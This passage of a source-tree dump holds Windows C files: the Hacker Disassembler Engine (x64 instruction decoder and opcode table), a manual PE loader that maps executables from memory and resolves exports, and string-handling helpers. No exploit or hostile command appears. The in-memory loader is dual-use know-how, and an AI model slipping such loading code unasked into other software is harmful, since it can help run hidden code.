error_operand;\n else\n break;\n }\n goto no_error_operand;\n } else if (hs->opcode2) {\n switch (opcode) {\n case 0x50: case 0xd7: case 0xf7:\n if (pref & (PRE_NONE | PRE_66))\n goto error_operand;\n break;\n case 0xd6:\n if (pref & (PRE_F2 | PRE_F3))\n goto error_operand;\n break;\n case 0xc5:\n goto error_operand;\n }\n goto no_error_operand;\n } else\n goto no_error_operand;\n\n error_operand:\n hs->flags |= F_ERROR | F_ERROR_OPERAND;\n no_error_operand:\n\n c = *p++;\n if (m_reg <= 1) {\n if (opcode == 0xf6)\n cflags |= C_IMM8;\n else if (opcode == 0xf7)\n cflags |= C_IMM_P66;\n }\n\n switch (m_mod) {\n case 0:\n if (pref & PRE_67) {\n if (m_rm == 6)\n disp_size = 2;\n } else\n if (m_rm == 5)\n disp_size = 4;\n break;\n case 1:\n disp_size = 1;\n break;\n case 2:\n disp_size = 2;\n if (!(pref & PRE_67))\n disp_size <<= 1;\n }\n\n if (m_mod != 3 && m_rm == 4) {\n hs->flags |= F_SIB;\n p++;\n hs->sib = c;\n hs->sib_scale = c >> 6;\n hs->sib_index = (c & 0x3f) >> 3;\n if ((hs->sib_base = c & 7) == 5 && !(m_mod & 1))\n disp_size = 4;\n }\n\n p--;\n switch (disp_size) {\n case 1:\n hs->flags |= F_DISP8;\n hs->disp.disp8 = *p;\n break;\n case 2:\n hs->flags |= F_DISP16;\n hs->disp.disp16 = *(uint16_t *)p;\n break;\n case 4:\n hs->flags |= F_DISP32;\n hs->disp.disp32 = *(uint32_t *)p;\n }\n p += disp_size;\n } else if (pref & PRE_LOCK)\n hs->flags |= F_ERROR | F_ERROR_LOCK;\n\n if (cflags & C_IMM_P66) {\n if (cflags & C_REL32) {\n if (pref & PRE_66) {\n hs->flags |= F_IMM16 | F_RELATIVE;\n hs->imm.imm16 = *(uint16_t *)p;\n p += 2;\n goto disasm_done;\n }\n goto rel32_ok;\n }\n if (op64) {\n hs->flags |= F_IMM64;\n hs->imm.imm64 = *(uint64_t *)p;\n p += 8;\n } else if (!(pref & PRE_66)) {\n hs->flags |= F_IMM32;\n hs->imm.imm32 = *(uint32_t *)p;\n p += 4;\n } else\n goto imm16_ok;\n }\n\n\n if (cflags & C_IMM16) {\n imm16_ok:\n hs->flags |= F_IMM16;\n hs->imm.imm16 = *(uint16_t *)p;\n p += 2;\n }\n if (cflags & C_IMM8) {\n hs->flags |= F_IMM8;\n hs->imm.imm8 = *p++;\n }\n\n if (cflags & C_REL32) {\n rel32_ok:\n hs->flags |= F_IMM32 | F_RELATIVE;\n hs->imm.imm32 = *(uint32_t *)p;\n p += 4;\n } else if (cflags & C_REL8) {\n hs->flags |= F_IMM8 | F_RELATIVE;\n hs->imm.imm8 = *p++;\n }\n\n disasm_done:\n\n if ((hs->len = (uint8_t)(p-(uint8_t *)code)) > 15) {\n hs->flags |= F_ERROR | F_ERROR_LENGTH;\n hs->len = 15;\n }\n\n return (unsigned int)hs->len;\n}\n#pragma warning(pop)\n"
},
{
"path": "Source/Shared/hde/hde64.h",
"content": "/*\n * Hacker Disassembler Engine 64\n * Copyright (c) 2008-2009, Vyacheslav Patkov.\n * All rights reserved.\n *\n * hde64.h: C/C++ header file\n *\n */\n\n#ifndef _HDE64_H_\n#define _HDE64_H_\n\n/* stdint.h - C99 standard header\n * http://en.wikipedia.org/wiki/stdint.h\n *\n * if your compiler doesn't contain \"stdint.h\" header (for\n * example, Microsoft Visual C++), you can download file:\n * http://www.azillionmonkeys.com/qed/pstdint.h\n * and change next line to:\n * #include \"pstdint.h\"\n */\n#include \"pstdint.h\"\n\n#define F_MODRM 0x00000001\n#define F_SIB 0x00000002\n#define F_IMM8 0x00000004\n#define F_IMM16 0x00000008\n#define F_IMM32 0x00000010\n#define F_IMM64 0x00000020\n#define F_DISP8 0x00000040\n#define F_DISP16 0x00000080\n#define F_DISP32 0x00000100\n#define F_RELATIVE 0x00000200\n#define F_ERROR 0x00001000\n#define F_ERROR_OPCODE 0x00002000\n#define F_ERROR_LENGTH 0x00004000\n#define F_ERROR_LOCK 0x00008000\n#define F_ERROR_OPERAND 0x00010000\n#define F_PREFIX_REPNZ 0x01000000\n#define F_PREFIX_REPX 0x02000000\n#define F_PREFIX_REP 0x03000000\n#define F_PREFIX_66 0x04000000\n#define F_PREFIX_67 0x08000000\n#define F_PREFIX_LOCK 0x10000000\n#define F_PREFIX_SEG 0x20000000\n#define F_PREFIX_REX 0x40000000\n#define F_PREFIX_ANY 0x7f000000\n\n#define PREFIX_SEGMENT_CS 0x2e\n#define PREFIX_SEGMENT_SS 0x36\n#define PREFIX_SEGMENT_DS 0x3e\n#define PREFIX_SEGMENT_ES 0x26\n#define PREFIX_SEGMENT_FS 0x64\n#define PREFIX_SEGMENT_GS 0x65\n#define PREFIX_LOCK 0xf0\n#define PREFIX_REPNZ 0xf2\n#define PREFIX_REPX 0xf3\n#define PREFIX_OPERAND_SIZE 0x66\n#define PREFIX_ADDRESS_SIZE 0x67\n\n#pragma pack(push,1)\n\ntypedef struct {\n uint8_t len;\n uint8_t p_rep;\n uint8_t p_lock;\n uint8_t p_seg;\n uint8_t p_66;\n uint8_t p_67;\n uint8_t rex;\n uint8_t rex_w;\n uint8_t rex_r;\n uint8_t rex_x;\n uint8_t rex_b;\n uint8_t opcode;\n uint8_t opcode2;\n uint8_t modrm;\n uint8_t modrm_mod;\n uint8_t modrm_reg;\n uint8_t modrm_rm;\n uint8_t sib;\n uint8_t sib_scale;\n uint8_t sib_index;\n uint8_t sib_base;\n union {\n uint8_t imm8;\n uint16_t imm16;\n uint32_t imm32;\n uint64_t imm64;\n } imm;\n union {\n uint8_t disp8;\n uint16_t disp16;\n uint32_t disp32;\n } disp;\n uint32_t flags;\n} hde64s;\n\n#pragma pack(pop)\n\n#ifdef __cplusplus\nextern \"C\" {\n#endif\n\n/* __cdecl */\nunsigned int hde64_disasm(const void *code, hde64s *hs);\n\n#ifdef __cplusplus\n}\n#endif\n\n#endif /* _HDE64_H_ */\n"
},
{
"path": "Source/Shared/hde/pstdint.h",
"content": "/*\n * MinHook - The Minimalistic API Hooking Library for x64/x86\n * Copyright (C) 2009-2015 Tsuda Kageyu. All rights reserved.\n *\n * Redistribution and use in source and binary forms, with or without\n * modification, are permitted provided that the following conditions\n * are met:\n *\n * 1. Redistributions of source code must retain the above copyright\n * notice, this list of conditions and the following disclaimer.\n * 2. Redistributions in binary form must reproduce the above copyright\n * notice, this list of conditions and the following disclaimer in the\n * documentation and/or other materials provided with the distribution.\n *\n * THIS SOFTWARE IS PROVIDED BY THE AUTHOR \"AS IS\" AND ANY EXPRESS OR\n * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES\n * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.\n * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,\n * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT\n * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF\n * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n */\n\n#pragma once\n\n#include \n\n// Integer types for HDE.\ntypedef INT8 int8_t;\ntypedef INT16 int16_t;\ntypedef INT32 int32_t;\ntypedef INT64 int64_t;\ntypedef UINT8 uint8_t;\ntypedef UINT16 uint16_t;\ntypedef UINT32 uint32_t;\ntypedef UINT64 uint64_t;\n"
},
{
"path": "Source/Shared/hde/table64.h",
"content": "/*\n * Hacker Disassembler Engine 64 C\n * Copyright (c) 2008-2009, Vyacheslav Patkov.\n * All rights reserved.\n *\n */\n\n#define C_NONE 0x00\n#define C_MODRM 0x01\n#define C_IMM8 0x02\n#define C_IMM16 0x04\n#define C_IMM_P66 0x10\n#define C_REL8 0x20\n#define C_REL32 0x40\n#define C_GROUP 0x80\n#define C_ERROR 0xff\n\n#define PRE_ANY 0x00\n#define PRE_NONE 0x01\n#define PRE_F2 0x02\n#define PRE_F3 0x04\n#define PRE_66 0x08\n#define PRE_67 0x10\n#define PRE_LOCK 0x20\n#define PRE_SEG 0x40\n#define PRE_ALL 0xff\n\n#define DELTA_OPCODES 0x4a\n#define DELTA_FPU_REG 0xfd\n#define DELTA_FPU_MODRM 0x104\n#define DELTA_PREFIXES 0x13c\n#define DELTA_OP_LOCK_OK 0x1ae\n#define DELTA_OP2_LOCK_OK 0x1c6\n#define DELTA_OP_ONLY_MEM 0x1d8\n#define DELTA_OP2_ONLY_MEM 0x1e7\n\nunsigned char hde64_table[] = {\n 0xa5,0xaa,0xa5,0xb8,0xa5,0xaa,0xa5,0xaa,0xa5,0xb8,0xa5,0xb8,0xa5,0xb8,0xa5,\n 0xb8,0xc0,0xc0,0xc0,0xc0,0xc0,0xc0,0xc0,0xc0,0xac,0xc0,0xcc,0xc0,0xa1,0xa1,\n 0xa1,0xa1,0xb1,0xa5,0xa5,0xa6,0xc0,0xc0,0xd7,0xda,0xe0,0xc0,0xe4,0xc0,0xea,\n 0xea,0xe0,0xe0,0x98,0xc8,0xee,0xf1,0xa5,0xd3,0xa5,0xa5,0xa1,0xea,0x9e,0xc0,\n 0xc0,0xc2,0xc0,0xe6,0x03,0x7f,0x11,0x7f,0x01,0x7f,0x01,0x3f,0x01,0x01,0xab,\n 0x8b,0x90,0x64,0x5b,0x5b,0x5b,0x5b,0x5b,0x92,0x5b,0x5b,0x76,0x90,0x92,0x92,\n 0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x6a,0x73,0x90,\n 0x5b,0x52,0x52,0x52,0x52,0x5b,0x5b,0x5b,0x5b,0x77,0x7c,0x77,0x85,0x5b,0x5b,\n 0x70,0x5b,0x7a,0xaf,0x76,0x76,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,\n 0x5b,0x5b,0x86,0x01,0x03,0x01,0x04,0x03,0xd5,0x03,0xd5,0x03,0xcc,0x01,0xbc,\n 0x03,0xf0,0x03,0x03,0x04,0x00,0x50,0x50,0x50,0x50,0xff,0x20,0x20,0x20,0x20,\n 0x01,0x01,0x01,0x01,0xc4,0x02,0x10,0xff,0xff,0xff,0x01,0x00,0x03,0x11,0xff,\n 0x03,0xc4,0xc6,0xc8,0x02,0x10,0x00,0xff,0xcc,0x01,0x01,0x01,0x00,0x00,0x00,\n 0x00,0x01,0x01,0x03,0x01,0xff,0xff,0xc0,0xc2,0x10,0x11,0x02,0x03,0x01,0x01,\n 0x01,0xff,0xff,0xff,0x00,0x00,0x00,0xff,0x00,0x00,0xff,0xff,0xff,0xff,0x10,\n 0x10,0x10,0x10,0x02,0x10,0x00,0x00,0xc6,0xc8,0x02,0x02,0x02,0x02,0x06,0x00,\n 0x04,0x00,0x02,0xff,0x00,0xc0,0xc2,0x01,0x01,0x03,0x03,0x03,0xca,0x40,0x00,\n 0x0a,0x00,0x04,0x00,0x00,0x00,0x00,0x7f,0x00,0x33,0x01,0x00,0x00,0x00,0x00,\n 0x00,0x00,0xff,0xbf,0xff,0xff,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0xff,0x00,\n 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff,\n 0x00,0x00,0x00,0xbf,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x7f,0x00,0x00,\n 0xff,0x40,0x40,0x40,0x40,0x41,0x49,0x40,0x40,0x40,0x40,0x4c,0x42,0x40,0x40,\n 0x40,0x40,0x40,0x40,0x40,0x40,0x4f,0x44,0x53,0x40,0x40,0x40,0x44,0x57,0x43,\n 0x5c,0x40,0x60,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,\n 0x40,0x40,0x64,0x66,0x6e,0x6b,0x40,0x40,0x6a,0x46,0x40,0x40,0x44,0x46,0x40,\n 0x40,0x5b,0x44,0x40,0x40,0x00,0x00,0x00,0x00,0x06,0x06,0x06,0x06,0x01,0x06,\n 0x06,0x02,0x06,0x06,0x00,0x06,0x00,0x0a,0x0a,0x00,0x00,0x00,0x02,0x07,0x07,\n 0x06,0x02,0x0d,0x06,0x06,0x06,0x0e,0x05,0x05,0x02,0x02,0x00,0x00,0x04,0x04,\n 0x04,0x04,0x05,0x06,0x06,0x06,0x00,0x00,0x00,0x0e,0x00,0x00,0x08,0x00,0x10,\n 0x00,0x18,0x00,0x20,0x00,0x28,0x00,0x30,0x00,0x80,0x01,0x82,0x01,0x86,0x00,\n 0xf6,0xcf,0xfe,0x3f,0xab,0x00,0xb0,0x00,0xb1,0x00,0xb3,0x00,0xba,0xf8,0xbb,\n 0x00,0xc0,0x00,0xc1,0x00,0xc7,0xbf,0x62,0xff,0x00,0x8d,0xff,0x00,0xc4,0xff,\n 0x00,0xc5,0xff,0x00,0xff,0xff,0xeb,0x01,0xff,0x0e,0x12,0x08,0x00,0x13,0x09,\n 0x00,0x16,0x08,0x00,0x17,0x09,0x00,0x2b,0x09,0x00,0xae,0xff,0x07,0xb2,0xff,\n 0x00,0xb4,0xff,0x00,0xb5,0xff,0x00,0xc3,0x01,0x00,0xc7,0xff,0xbf,0xe7,0x08,\n 0x00,0xf0,0x02,0x00\n};\n"
},
{
"path": "Source/Shared/itostr.c",
"content": "#include \"rtltypes.h\"\n\nsize_t itostr_a(int x, char *s)\n{\n\tint\t\tt;\n\tsize_t\ti, r = 1, sign;\n\n\tt = x;\n\n\tif (x < 0) {\n\t\tsign = 1;\n\t\twhile (t <= -10) {\n\t\t\tt /= 10;\n\t\t\tr++;\n\t\t}\n\t}\n\telse {\n\t\tsign = 0;\n\t\twhile (t >= 10) {\n\t\t\tt /= 10;\n\t\t\tr++;\n\t\t}\n\t}\n\n\tif (s == 0)\n\t\treturn r + sign;\n\n\tif (sign) {\n\t\t*s = '-';\n\t\ts++;\n\t}\n\n\tfor (i = r; i != 0; i--) {\n\t\ts[i - 1] = (char)byteabs(x % 10) + '0';\n\t\tx /= 10;\n\t}\n\n\ts[r] = (char)0;\n\treturn r + sign;\n}\n\n\nsize_t itostr_w(int x, wchar_t *s)\n{\n\tint\t\tt;\n\tsize_t\ti, r = 1, sign;\n\n\tt = x;\n\n\tif (x < 0) {\n\t\tsign = 1;\n\t\twhile (t <= -10) {\n\t\t\tt /= 10;\n\t\t\tr++;\n\t\t}\n\t}\n\telse {\n\t\tsign = 0;\n\t\twhile (t >= 10) {\n\t\t\tt /= 10;\n\t\t\tr++;\n\t\t}\n\t}\n\n\tif (s == 0)\n\t\treturn r + sign;\n\n\tif (sign) {\n\t\t*s = '-';\n\t\ts++;\n\t}\n\n\tfor (i = r; i != 0; i--) {\n\t\ts[i - 1] = (wchar_t)byteabs(x % 10) + L'0';\n\t\tx /= 10;\n\t}\n\n\ts[r] = (wchar_t)0;\n\treturn r + sign;\n}\n"
},
{
"path": "Source/Shared/ldr.c",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2015 - 2025\n*\n* TITLE: LDR.C\n*\n* VERSION: 3.69\n*\n* DATE: 07 Jul 2025\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#include \"global.h\"\n\nDWORD align_gt(\n DWORD p,\n DWORD align\n)\n{\n DWORD remainder;\n\n if (align == 0) return p;\n remainder = p % align;\n if (remainder == 0) return p;\n\n if (p > MAXDWORD - (align - remainder)) return p;\n return p + (align - remainder);\n}\n\nDWORD align_le(\n DWORD p,\n DWORD align\n)\n{\n if ((p % align) == 0)\n return p;\n\n return p - (p % align);\n}\n\nLPVOID PELoaderLoadImage(\n _In_ LPVOID Buffer,\n _Out_opt_ PDWORD SizeOfImage\n)\n{\n DWORD c, p, rsz;\n DWORD optHeaderSize = 0, headersSize = 0;\n DWORD_PTR delta;\n LPWORD chains;\n LPVOID exeBuffer = NULL;\n PIMAGE_DOS_HEADER dosh;\n PIMAGE_FILE_HEADER fileh;\n PIMAGE_OPTIONAL_HEADER popth;\n PIMAGE_SECTION_HEADER sections;\n PIMAGE_BASE_RELOCATION rel;\n PIMAGE_NT_HEADERS nth = NULL;\n\n do {\n if (Buffer == NULL) {\n SetLastError(ERROR_INVALID_PARAMETER);\n break;\n }\n\n // check image headers\n // we are supposed to deal with valid or system bins usually so these checks are slightly redurant\n\n dosh = (PIMAGE_DOS_HEADER)Buffer;\n if (dosh->e_magic != IMAGE_DOS_SIGNATURE) {\n SetLastError(ERROR_BAD_EXE_FORMAT);\n break;\n }\n\n if (dosh->e_lfanew < sizeof(IMAGE_DOS_HEADER) || dosh->e_lfanew > 0xFFFFF) {\n SetLastError(ERROR_INVALID_EXE_SIGNATURE);\n break;\n }\n\n nth = (PIMAGE_NT_HEADERS)((PBYTE)Buffer + dosh->e_lfanew);\n if (nth->Signature != IMAGE_NT_SIGNATURE) {\n SetLastError(ERROR_INVALID_EXE_SIGNATURE);\n break;\n }\n\n fileh = (PIMAGE_FILE_HEADER)((PBYTE)dosh + sizeof(DWORD) + dosh->e_lfanew);\n optHeaderSize = fileh->SizeOfOptionalHeader;\n if (optHeaderSize != sizeof(IMAGE_OPTIONAL_HEADER32) &&\n optHeaderSize != sizeof(IMAGE_OPTIONAL_HEADER64)) {\n SetLastError(ERROR_BAD_EXE_FORMAT);\n break;\n }\n\n popth = (PIMAGE_OPTIONAL_HEADER)((PBYTE)fileh + sizeof(IMAGE_FILE_HEADER));\n if (popth->Magic != IMAGE_NT_OPTIONAL_HDR32_MAGIC &&\n popth->Magic != IMAGE_NT_OPTIONAL_HDR64_MAGIC) {\n SetLastError(ERROR_EXE_MARKED_INVALID);\n break;\n }\n\n if (SizeOfImage) *SizeOfImage = popth->SizeOfImage;\n\n // render image\n headersSize = align_gt(popth->SizeOfHeaders, popth->FileAlignment);\n if (headersSize > popth->SizeOfImage) {\n SetLastError(ERROR_BAD_EXE_FORMAT);\n break;\n }\n\n exeBuffer = VirtualAlloc(NULL, popth->SizeOfImage, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);\n if (exeBuffer == NULL) {\n SetLastError(ERROR_NOT_ENOUGH_MEMORY);\n break;\n }\n\n memcpy(exeBuffer, Buffer, min(headersSize, popth->SizeOfHeaders));\n\n sections = (PIMAGE_SECTION_HEADER)((PBYTE)fileh + sizeof(IMAGE_FILE_HEADER) + fileh->SizeOfOptionalHeader);\n for (c = 0; c < fileh->NumberOfSections; c++) {\n if ((sections[c].SizeOfRawData > 0) && (sections[c].PointerToRawData > 0)) {\n memcpy((PBYTE)exeBuffer + sections[c].VirtualAddress,\n (PBYTE)Buffer + align_le(sections[c].PointerToRawData, popth->FileAlignment),\n align_gt(sections[c].SizeOfRawData, popth->FileAlignment));\n }\n }\n\n // reloc image\n dosh = (PIMAGE_DOS_HEADER)exeBuffer;\n fileh = (PIMAGE_FILE_HEADER)((PBYTE)dosh + sizeof(DWORD) + dosh->e_lfanew);\n popth = (PIMAGE_OPTIONAL_HEADER)((PBYTE)fileh + sizeof(IMAGE_FILE_HEADER));\n\n if (popth->NumberOfRvaAndSizes > IMAGE_DIRECTORY_ENTRY_BASERELOC)\n if (popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress != 0)\n {\n rel = (PIMAGE_BASE_RELOCATION)((PBYTE)exeBuffer + popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress);\n rsz = popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size;\n delta = (DWORD_PTR)exeBuffer - popth->ImageBase;\n\n c = 0;\n while (c < rsz) {\n p = sizeof(IMAGE_BASE_RELOCATION);\n chains = (LPWORD)((PBYTE)rel + p);\n\n while (p < rel->SizeOfBlock) {\n\n switch (*chains >> 12) {\n case IMAGE_REL_BASED_HIGHLOW:\n *(LPDWORD)((ULONG_PTR)exeBuffer + rel->VirtualAddress + (*chains & 0x0fff)) += (DWORD)delta;\n break;\n case IMAGE_REL_BASED_DIR64:\n *(PULONGLONG)((ULONG_PTR)exeBuffer + rel->VirtualAddress + (*chains & 0x0fff)) += delta;\n break;\n }\n\n chains++;\n p += sizeof(WORD);\n }\n\n c += rel->SizeOfBlock;\n rel = (PIMAGE_BASE_RELOCATION)((PBYTE)rel + rel->SizeOfBlock);\n }\n }\n\n return exeBuffer;\n\n } while (FALSE);\n\n return NULL;\n}\n\nLPVOID PELoaderGetProcAddress(\n _In_ LPVOID ImageBase,\n _In_ PCHAR RoutineName\n)\n{\n USHORT OrdinalIndex;\n LONG Result;\n PIMAGE_EXPORT_DIRECTORY ExportDirectory = NULL;\n PULONG NameTableBase, FunctionTableBase;\n PUSHORT NameOrdinalTableBase;\n PCHAR CurrentName;\n ULONG High, Low, Middle = 0;\n ULONG ExportDirRVA, ExportDirSize;\n ULONG FunctionRVA;\n\n union {\n PIMAGE_NT_HEADERS64 nt64;\n PIMAGE_NT_HEADERS32 nt32;\n PIMAGE_NT_HEADERS nt;\n } NtHeaders;\n\n if (ImageBase == NULL || RoutineName == NULL) {\n SetLastError(ERROR_INVALID_PARAMETER);\n return NULL;\n }\n\n NtHeaders.nt = RtlImageNtHeader(ImageBase);\n if (NtHeaders.nt == NULL) {\n SetLastError(ERROR_INVALID_PARAMETER);\n return NULL;\n }\n\n if (NtHeaders.nt->FileHeader.Machine == IMAGE_FILE_MACHINE_AMD64) {\n ExportDirRVA = NtHeaders.nt64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;\n ExportDirSize = NtHeaders.nt64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size;\n }\n else if (NtHeaders.nt->FileHeader.Machine == IMAGE_FILE_MACHINE_I386) {\n ExportDirRVA = NtHeaders.nt32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;\n ExportDirSize = NtHeaders.nt32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size;\n }\n else {\n SetLastError(ERROR_EXE_MACHINE_TYPE_MISMATCH);\n return NULL;\n }\n\n if (ExportDirRVA == 0 || ExportDirSize == 0) {\n SetLastError(ERROR_PROC_NOT_FOUND);\n return NULL;\n }\n\n ExportDirectory = (PIMAGE_EXPORT_DIRECTORY)RtlOffsetToPointer((ULONG_PTR)ImageBase, ExportDirRVA);\n NameTableBase = (PULONG)RtlOffsetToPointer(ImageBase, (ULONG)ExportDirectory->AddressOfNames);\n NameOrdinalTableBase = (PUSHORT)RtlOffsetToPointer(ImageBase, (ULONG)ExportDirectory->AddressOfNameOrdinals);\n FunctionTableBase = (PULONG)((ULONG_PTR)ImageBase + ExportDirectory->AddressOfFunctions);\n\n if (ExportDirectory->NumberOfNames == 0) {\n SetLastError(ERROR_PROC_NOT_FOUND);\n return NULL;\n }\n\n Low = 0;\n High = ExportDirectory->NumberOfNames - 1;\n\n while (Low <= High) {\n Middle = Low + (High - Low) / 2;\n CurrentName = (PCHAR)RtlOffsetToPointer((ULONG_PTR)ImageBase, NameTableBase[Middle]);\n Result = _strcmp_a(RoutineName, CurrentName);\n if (Result == 0) {\n OrdinalIndex = NameOrdinalTableBase[Middle];\n if (OrdinalIndex >= ExportDirectory->NumberOfFunctions) {\n SetLastError(ERROR_PROC_NOT_FOUND);\n return NULL;\n }\n FunctionRVA = FunctionTableBase[OrdinalIndex];\n if (FunctionRVA == 0) {\n SetLastError(ERROR_PROC_NOT_FOUND);\n return NULL;\n }\n return (LPVOID)RtlOffsetToPointer((ULONG_PTR)ImageBase, FunctionRVA);\n }\n if (Result < 0) {\n if (Middle == 0) break;\n High = Middle - 1;\n }\n else {\n Low = Middle + 1;\n }\n\n }\n\n SetLastError(ERROR_PROC_NOT_FOUND);\n return NULL;\n}\n"
},
{
"path": "Source/Shared/ldr.h",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2015 - 2017\n*\n* TITLE: LDR.H\n*\n* VERSION: 2.72\n*\n* DATE: 26 May 2017\n*\n* Common header file for PE loader unit.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#pragma once\n\nLPVOID PELoaderLoadImage(\n _In_ LPVOID Buffer,\n _Out_opt_ PDWORD SizeOfImage);\n\nLPVOID PELoaderGetProcAddress(\n _In_ LPVOID ImageBase,\n _In_ PCHAR RoutineName);\n"
},
{
"path": "Source/Shared/libinc.h",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2018\n*\n* TITLE: LIBINC.H\n*\n* VERSION: 1.0.02\n*\n* DATE: 18 Nov 2018\n*\n* Master header file for C Runtime libraries include.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#pragma once\n\n#if defined (_MSC_VER)\n #if (_MSC_VER >= 1900) //VS15, 17 etc\n #ifdef _DEBUG\n #pragma comment(lib, \"vcruntimed.lib\")\n #pragma comment(lib, \"ucrtd.lib\")\n #else\n #pragma comment(lib, \"libucrt.lib\")\n #pragma comment(lib, \"libvcruntime.lib\")\n #endif\n #endif\n#endif\n"
},
{
"path": "Source/Shared/minirtl.h",
"content": "/*\nModule name:\n\tminirtl.h\n\nDescription:\n\theader for string handling and conversion routines\n\nDate:\n\t4 Oct 2020\n*/\n\n#pragma once\n\n#ifndef _MINIRTL_\n#define _MINIRTL_\n\n// string copy/concat/length\n\nchar *_strend_a(const char *s);\nwchar_t *_strend_w(const wchar_t *s);\n\nchar *_strcpy_a(char *dest, const char *src);\nwchar_t *_strcpy_w(wchar_t *dest, const wchar_t *src);\n\nchar *_strcat_a(char *dest, const char *src);\nwchar_t *_strcat_w(wchar_t *dest, const wchar_t *src);\n\nchar *_strncpy_a(char *dest, size_t ccdest, const char *src, size_t ccsrc);\nwchar_t *_strncpy_w(wchar_t *dest, size_t ccdest, const wchar_t *src, size_t ccsrc);\n\nchar *_strcpyn_a(char* dest, const char* src, size_t n);\nwchar_t *_strcpyn_w(wchar_t* dest, const wchar_t* src, size_t n);\n\nsize_t _strlen_a(const char *s);\nsize_t _strlen_w(const wchar_t *s);\n\n// comparing\n\nint _strcmp_a(const char *s1, const char *s2);\nint _strcmp_w(const wchar_t *s1, const wchar_t *s2);\n\nint _strncmp_a(const char *s1, const char *s2, size_t cchars);\nint _strncmp_w(const wchar_t *s1, const wchar_t *s2, size_t cchars);\n\nint _strcmpi_a(const char *s1, const char *s2);\nint _strcmpi_w(const wchar_t *s1, const wchar_t *s2);\n\nint _strncmpi_a(const char *s1, const char *s2, size_t cchars);\nint _strncmpi_w(const wchar_t *s1, const wchar_t *s2, size_t cchars);\n\nchar *_strstr_a(const char *s, const char *sub_s);\nwchar_t *_strstr_w(const wchar_t *s, const wchar_t *sub_s);\n\nchar *_strstri_a(const char *s, const char *sub_s);\nwchar_t *_strstri_w(const wchar_t *s, const wchar_t *sub_s);\n\nchar *_strchr_a(const char *s, const char ch);\nwchar_t *_strchr_w(const wchar_t *s, const wchar_t ch);\n\n\n// conversion of integer types to string, returning string length\n\nsize_t ultostr_a(unsigned long x, char *s);\nsize_t ultostr_w(unsigned long x, wchar_t *s);\n\nsize_t ultohex_a(unsigned long x, char *s);\nsize_t ultohex_w(unsigned long x, wchar_t *s);\n\nsize_t itostr_a(int x, char *s);\nsize_t itostr_w(int x, wchar_t *s);\n\nsize_t i64tostr_a(signed long long x, char *s);\nsize_t i64tostr_w(signed long long x, wchar_t *s);\n\nsize_t u64tostr_a(unsigned long long x, char *s);\nsize_t u64tostr_w(unsigned long long x, wchar_t *s);\n\nsize_t u64tohex_a(unsigned long long x, char *s);\nsize_t u64tohex_w(unsigned long long x, wchar_t *s);\n\n// string to integers conversion\n\nunsigned long strtoul_a(char *s);\nunsigned long strtoul_w(wchar_t *s);\n\nunsigned long long strtou64_a(char *s);\nunsigned long long strtou64_w(wchar_t *s);\n\nunsigned long hextoul_a(char *s);\nunsigned long hextoul_w(wchar_t *s);\n\nint strtoi_a(char *s);\nint strtoi_w(wchar_t *s);\n\nsigned long long strtoi64_a(char *s);\nsigned long long strtoi64_w(wchar_t *s);\n\nunsigned long long hextou64_a(char *s);\nunsigned long long hextou64_w(wchar_t *s);\n\n/* =================================== */\n\n#ifdef UNICODE\n\n#define _strend _strend_w\n#define _strcpy _strcpy_w\n#define _strcat _strcat_w\n#define _strlen _strlen_w\n#define _strncpy _strncpy_w\n#define _strcpyn _strcpyn_w\n\n#define _strcmp 